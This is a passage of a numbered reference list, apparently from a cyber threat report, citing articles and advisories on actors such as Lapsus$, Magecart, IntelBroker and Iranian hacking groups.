13. Uber Hack – A Deeper Dive – Singapore – InsiderSecurity, accessed July 5, 2025, https://insidersecurity.co/uber-hack-a-deeper-dive/
14. Lapsus$ – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/Lapsus$
15. Uber Cybersecurity Incident: Which Logs Do IR Teams Need to Focus On? – Mitiga, accessed July 5, 2025, https://www.mitiga.io/blog/uber-cybersecurity-incident-which-logs-do-ir-teams-need-to-focus-on
16. Magecart threat actor rolls out convincing modal forms – Malwarebytes, accessed July 5, 2025, https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
17. What Is Magecart | Attack Examples & Prevention Techniques – Imperva, accessed July 5, 2025, https://www.imperva.com/learn/application-security/magecart/
18. Magecart Attacks: Prevention Tips and Security Best Practices – Kroll, accessed July 5, 2025, https://www.kroll.com/en/insights/publications/cyber/monitor/what-is-magecart-malware-how-to-protect-against-it
19. Iran-Based Threat Actor Exploits VPN Vulnerabilities | CISA, accessed July 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a
20. New Xanthorox AI Threat Puts MSSPs, MPS, and Security Teams on Notice | MSSP Alert, accessed July 5, 2025, https://www.msspalert.com/news/new-xanthorox-ai-threat-puts-mssps-mps-and-security-teams-on-notice
21. DustSquad, Golden Falcon – Threat Group Cards: A Threat Actor Encyclopedia, accessed July 5, 2025, https://apt.etda.or.th/cgi-bin/showcard.cgi?g=DustSquad%2C%20Golden%20Falcon
22. Hacktivist Group: Team Insane PK – Radware, accessed July 5, 2025, https://www.radware.com/cyberpedia/ddos-attacks/hacktivist-group-team-insane-pk/
23. U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT Networks, and Critical Infrastructure – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
24. Part 1: The Iran-Israel Cyber Standoff – The Hacktivist Front | CloudSEK, accessed July 5, 2025, https://www.cloudsek.com/blog/part-1-the-iran-israel-cyber-standoff—the-hacktivist-front
25. DarkEngine: CyberCX Uncovers Highly Orchestrated WordPress Phishing Campaign – CyberCX, accessed July 5, 2025, https://cybercx.com.au/blog/dark-engine/
26. WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks – SentinelOne, accessed July 5, 2025, https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/
27. Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing” – Sophos, accessed July 5, 2025, https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/
28. Verizon and T-Mobile Deny Data Breaches as Millions of User Records Sold Online – Hackread, accessed July 5, 2025, https://hackread.com/verizon-t-mobile-deny-data-breaches-user-records-sold/
29. Alleged Verizon Data Breach: 61 Million Customer Records Offered for Sale – Reddit, accessed July 5, 2025, https://www.reddit.com/r/cybersecurity/comments/1lpzj7c/alleged_verizon_data_breach_61_million_customer/
30. Adversarial Misuse of Generative AI | Google Cloud Blog, accessed July 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai
31. APT26 (Threat Actor) – Malpedia, accessed July 5, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/apt26
32. BlackTech (Threat Actor) – Malpedia, accessed July 5, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/blacktech
33. TRIPLESTRENGTH Hits Cloud for Cryptojacking, On-Premises Systems for Ransomware – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2025/01/triplestrength-targets-cloud-platforms.html
34. Flash Report: Prominent Threat Actors Reportedly Arrested – ZeroFox, accessed July 5, 2025, https://www.zerofox.com/intelligence/flash-report-prominent-threat-actors-reportedly-arrested/
35. The FBI thinks it’s nailed the notorious ‘IntelBroker’ threat actor | IT Pro – ITPro, accessed July 5, 2025, https://www.itpro.com/security/cyber-crime/the-fbi-thinks-its-nailed-the-notorious-intelbroker-threat-actor
36. Southern District of New York | Serial Hacker “IntelBroker” Charged For Causing $25 Million In Damages To Victims | United States Department of Justice, accessed July 5, 2025, https://www.justice.gov/usao-sdny/pr/serial-hacker-intelbroker-charged-causing-25-million-damages-victims
37. Global Crackdown Leads to BreachForums Arrest – Searchlight Cyber, accessed July 5, 2025, https://slcyber.io/blog/global-crackdown-leads-to-breachforums-arrest/
38. Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2024/09/hacktivist-group-twelve-targets-russian.html
39. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
40. The Dark Overlord (hacker group) – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/The_Dark_Overlord_(hacker_group)
41. Anonymous (hacker group) – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)